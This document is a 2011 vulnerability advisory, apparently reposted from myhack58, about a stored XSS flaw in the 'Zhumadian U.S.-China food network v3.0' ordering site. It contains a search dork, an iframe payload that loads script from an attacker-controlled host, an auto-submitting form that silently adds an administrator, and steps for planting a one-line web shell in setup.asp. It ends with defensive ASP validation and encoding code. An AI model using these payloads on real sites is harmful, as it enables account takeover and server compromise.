Zhumadian-day U.S.-China food network v3.0 Business Edition: XSS adds an administrator - vulnerability warning

ID MYHACK58:62201128749
Type myhack58
Reporter Anonymous
Modified 2011-01-02T00:00:00


Version: Zhumadian days of the U.S. Food network v3.0 Business Edition

Keywords: inurl:wenhua_display.asp

XSS code:

    <iframe src=http://[domain of your hosting space]/xss.html>

HTML code:

    <form name="admin" action="http://[target site domain]/admin/admin_add_save.asp" method="POST" onSubmit="return validate(this)">
    <input type="text" name="username" value="this is account number">
    <input type="text" name="password" value="here is the password">
    <input type="submit" value="OK submit" name="B1" class="buttonface">
    </form>
    <body onload="javascript:document.forms[0].submit()"></body>

Exp: First, modify the HTML code and upload it to your hosting space. In the ordering discount section, select any branch, then select [Online Booking] and submit the XSS code in the name and phone fields. Wait for the back-office administrator to open [Online Order]; that triggers the XSS, the HTML form runs, and the administrator is added successfully. Once added, go into the back office, insert the one-line script in [Site Settings], and connect to http://[target site domain]/setup.asp. In my local test I did not connect to the one-line script, so test it yourselves; in any case, [Site Settings] saves to /setup.asp.

Repair method: filter the data submitted to the file yuding.asp.
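The repair described above, as an added example in classic ASP (VBScript) that is not the vendor's code: allow-list validation of the booking fields in yuding.asp, plus HTML-encoding when the back-office page renders stored values. The form field names `name` and `phone`, the length limits, the patterns and the helper names are assumptions.

```asp
<%
Option Explicit
' Added example, not the vendor's code. Field names, limits and helper
' names below are assumptions made for illustration.

' True only if value is non-empty, within maxLen, and matches pattern in full.
Function IsValidField(value, pattern, maxLen)
    Dim re
    IsValidField = False
    If Len(value) = 0 Or Len(value) > maxLen Then Exit Function
    Set re = New RegExp
    re.Pattern = pattern
    IsValidField = re.Test(value)
    Set re = Nothing
End Function

' Output side (back-office order list): encode stored values when rendering,
' so rows saved before the filter existed cannot run as markup either.
Function SafeCell(value)
    SafeCell = "<td>" & Server.HTMLEncode(value & "") & "</td>"
End Function

' Input side (yuding.asp): read the two fields the booking form submits.
Dim custName, custPhone
custName  = Trim(Request.Form("name"))
custPhone = Trim(Request.Form("phone"))

' Allow-list rules: the phone is digits, "+", "-" and spaces only; the name
' may contain any letters (including CJK) but no markup or script
' metacharacters and no line breaks. Bad input is rejected, not stripped.
If Not IsValidField(custPhone, "^[0-9+\- ]+$", 20) _
   Or Not IsValidField(custName, "^[^<>""'&%;()\\/=\r\n]+$", 30) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid name or phone number."
    Response.End
End If

' From here custName and custPhone are safe to store; use a parameterized
' ADODB.Command for the insert rather than string concatenation.
%>
```

Validation on input and encoding on output are both needed: the first stops new payloads from being stored, the second neutralizes anything already in the order table.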